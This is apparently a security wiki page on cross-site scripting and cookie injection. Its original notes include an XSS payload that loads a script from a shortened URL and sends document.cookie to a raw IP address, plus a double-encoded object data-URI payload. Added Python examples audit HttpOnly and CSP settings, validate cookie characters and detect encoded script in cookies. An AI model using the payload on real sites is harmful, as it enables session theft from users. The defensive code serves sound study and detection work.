Wil Koch edited this page May 25, 2015 · 17 revisions
- Need an automated way to determine the constraints
- Need a method that takes (payload, constraints) and generates the XSS injection

# Examples

Use a jQuery AJAX GET request to a CORS-configured server:

```html
<script src='http://goo.gl/8LXprn'></script><script>$.get('http://52.13.21.28', {cookies:document.cookie})</script>
```

The `data` attribute of an `<object>` can carry a `data:` URI holding JavaScript or HTML, but the embedded document cannot read the page's cookies. The payload below is percent-encoded (%XX), and because it sits inside a URL the percent signs are themselves encoded as %25, so it must be decoded twice:

```html
<object data="data:text/html;hex,%253c%2573%2563%2572%2569%2570%2574%253e%2561%253c%252f%2573%2563%2572%2569%2570%2574%253e"></object>
```
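Added example (not from the original wiki): the two server-side controls that defeat this particular exfiltration are the `HttpOnly` cookie attribute, which keeps the value out of `document.cookie`, and a Content-Security-Policy `script-src` that does not list the shortened-URL host. The Python below audits a `Set-Cookie` header for those attributes and does simplified CSP host-source matching. The policy string and the page origin `https://app.example.com` are constructed for the example; nonces, hashes and path matching are not modelled.

```python
from urllib.parse import urlsplit


def parse_set_cookie(header: str) -> tuple:
    """Split 'name=value; Attr; Attr=val' into (name, value, {attr_lowercase: value or True})."""
    parts = [p.strip() for p in header.split(';')]
    name, _, value = parts[0].partition('=')
    attrs = {}
    for attr in parts[1:]:
        key, _, val = attr.partition('=')
        if key:
            attrs[key.strip().lower()] = val.strip() if val else True
    return name.strip(), value, attrs


def audit_set_cookie(header: str) -> list:
    """List the missing attributes that leave a cookie exposed to document.cookie theft."""
    _, _, attrs = parse_set_cookie(header)
    findings = []
    if 'httponly' not in attrs:
        findings.append('HttpOnly missing: the value is readable from script via document.cookie')
    if 'secure' not in attrs:
        findings.append('Secure missing: the cookie is also sent over plaintext HTTP')
    return findings


def script_allowed_by_csp(policy: str, page_origin: str, script_url: str) -> bool:
    """Decide whether a <script src=...> load passes script-src (falling back to default-src).

    Host-source matching only: 'none', 'self', '*', scheme://host, host and *.host wildcards.
    """
    directives = {}
    for directive in policy.split(';'):
        name, _, sources = directive.strip().partition(' ')
        if name:
            directives[name.lower()] = sources.split()
    sources = directives.get('script-src', directives.get('default-src'))
    if sources is None:
        return True  # no directive covers scripts, so any origin may be loaded
    target, page = urlsplit(script_url), urlsplit(page_origin)
    for source in sources:
        s = source.lower()
        if s == "'none'":
            return False
        if s == '*':
            return True
        if s == "'self'":
            if (target.scheme, target.netloc) == (page.scheme, page.netloc):
                return True
            continue
        if s.startswith("'"):
            continue  # 'unsafe-inline', nonce-..., sha256-...: not host sources
        scheme, _, host = s.rpartition('://')
        host = host.split('/', 1)[0]  # path part ignored (not modelled)
        if scheme and scheme != target.scheme:
            continue
        if host.startswith('*.'):
            if target.hostname and target.hostname.endswith(host[1:]):
                return True
        elif host in (target.netloc, target.hostname):
            return True
    return False


# Constructed sample policy and origin (hypothetical, not from the page)
POLICY = "default-src 'self'; script-src 'self' https://ajax.googleapis.com"
PAGE = 'https://app.example.com'

if __name__ == '__main__':
    for hdr in ('sid=abc123; Path=/', 'sid=abc123; Path=/; Secure; HttpOnly'):
        print(hdr, '->', audit_set_cookie(hdr) or 'ok')
    for url in ('http://goo.gl/8LXprn',
                'https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js'):
        print(url, '->', 'allowed' if script_allowed_by_csp(POLICY, PAGE, url) else 'blocked')
```

With `HttpOnly` set, `$.get(..., {cookies: document.cookie})` sends nothing useful even if the script runs; with the policy above, the `goo.gl` script tag never loads in the first place.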

# jQuery

```html
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script>
```

http://goo.gl/8LXprn

To URI-decode in Python (Python 3 shown; the original used Python 2's `urllib.unquote(s).decode('utf8')`):

```python
from urllib.parse import unquote  # Python 3 location of unquote
# Apply once per layer of percent-encoding, e.g. %253c -> %3c -> <
print(unquote(unquote('%253c%2573%2563%2572%2569%2570%2574%253e')))
```

# Characters in cookies

### Include

The cookie-value alphabet (RFC 6265 `cookie-octet`):

- 0x21: `!`
- 0x23-0x2B: `#$%&'()*+`
- 0x2D-0x3A: `-./0123456789:`
- 0x3C-0x5B: `<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[`
- 0x5D-0x7E: `` ]^_`abcdefghijklmnopqrstuvwxyz{|}~ ``

### Exclude

CTLs, whitespace, DQUOTE, comma, semicolon and backslash; the allowed set is US-ASCII minus these.
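Added example (not part of the original page): a validator for the alphabet listed above, built from the same ranges, plus a helper that checks every pair of a `Cookie` request header. The sample values are constructed. The point it makes for a defender is that the grammar is not a content filter: `<script>`, percent-encoded text and base64 are all well-formed cookie values, so cookie contents have to be treated as untrusted input on the server.

```python
# Cookie-value alphabet from RFC 6265 (the "Include" list above): printable US-ASCII
# minus CTLs, whitespace, DQUOTE (0x22), comma (0x2C), semicolon (0x3B) and backslash (0x5C).
COOKIE_OCTETS = frozenset(
    chr(c) for c in range(0x21, 0x7F) if c not in (0x22, 0x2C, 0x3B, 0x5C)
)


def invalid_cookie_chars(value: str) -> list:
    """Characters in `value` that RFC 6265 does not permit in a cookie-value (sorted, unique).

    The grammar allows one surrounding DQUOTE pair, so that pair is stripped before checking.
    """
    if len(value) >= 2 and value[0] == value[-1] == '"':
        value = value[1:-1]
    return sorted(set(value) - COOKIE_OCTETS)


def is_valid_cookie_value(value: str) -> bool:
    """True when every character of `value` is a cookie-octet."""
    return not invalid_cookie_chars(value)


def check_cookie_header(header: str) -> dict:
    """Split a Cookie request header into name=value pairs; report offending chars per name."""
    findings = {}
    for pair in header.split(';'):
        name, _, value = pair.strip().partition('=')
        bad = invalid_cookie_chars(value)
        if name and bad:
            findings[name] = bad
    return findings


if __name__ == '__main__':
    # Constructed samples, not from the page
    for v in ('abc123', '<script>', 'PHNjcmlwdD4=', '%3Cscript%3E', 'hello world', 'a,b', '"quoted"'):
        print(repr(v), 'valid' if is_valid_cookie_value(v) else invalid_cookie_chars(v))
    print(check_cookie_header('sid=abc123; note=hello world; raw=a"b'))
```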

# Cookie Injection

## Base64

## URI encoding: `eval(decodeURIComponent())`
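Added example (not part of the original page): detection logic for the two encodings these headings name. It repeatedly percent-decodes and base64-decodes a cookie value, keeps every intermediate layer so an alert can show how the content was wrapped, and reports whether any layer contains script-like text. The indicator list and the sample cookie values are constructed for the example and deliberately small; a real ruleset would be broader.

```python
import base64
import binascii
from urllib.parse import unquote

# Strings whose presence in any decoded layer is worth an alert. Constructed for this
# example from the shapes that appear on the page; not a complete ruleset.
INDICATORS = ('<script', 'eval(', 'decodeuricomponent(')


def try_base64(text: str):
    """Return the decoded text if `text` is valid base64 that yields printable ASCII, else None."""
    try:
        raw = base64.b64decode(text, validate=True)
    except (binascii.Error, ValueError):
        return None
    if not raw or any(b < 0x20 or b > 0x7E for b in raw):
        return None
    return raw.decode('ascii')


def peel_encodings(value: str, max_layers: int = 5) -> list:
    """Undo percent-encoding and base64 until the value stops changing.

    Returns every form seen, outermost first, so layer 0 is the raw cookie value.
    """
    seen = [value]
    current = value
    for _ in range(max_layers):
        if '%' in current and unquote(current) != current:
            current = unquote(current)
        else:
            decoded = try_base64(current)
            if decoded is None or decoded == current:
                break
            current = decoded
        seen.append(current)
    return seen


def suspicious_layers(value: str) -> list:
    """(layer_index, indicator) pairs for every indicator found in any decoding layer."""
    hits = []
    for i, layer in enumerate(peel_encodings(value)):
        low = layer.lower()
        hits.extend((i, ind) for ind in INDICATORS if ind in low)
    return hits


def scan_cookie_header(header: str) -> dict:
    """Run suspicious_layers over every pair of a Cookie request header; names with hits only."""
    report = {}
    for pair in header.split(';'):
        name, _, value = pair.strip().partition('=')
        if name:
            hits = suspicious_layers(value)
            if hits:
                report[name] = hits
    return report


if __name__ == '__main__':
    # Constructed sample values: a plain value, base64 of "user=alice", a double
    # percent-encoded script tag, and base64 of "<script>".
    for v in ('dark', 'dXNlcj1hbGljZQ==', '%253Cscript%253E', 'PHNjcmlwdD4='):
        print(repr(v), peel_encodings(v), suspicious_layers(v))
    print(scan_cookie_header('sid=abc123; theme=dark; pref=PHNjcmlwdD4='))
```

The server-side fix is the same for both encodings: never hand cookie contents to `eval` or any other code sink, regardless of how they were encoded.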

# References
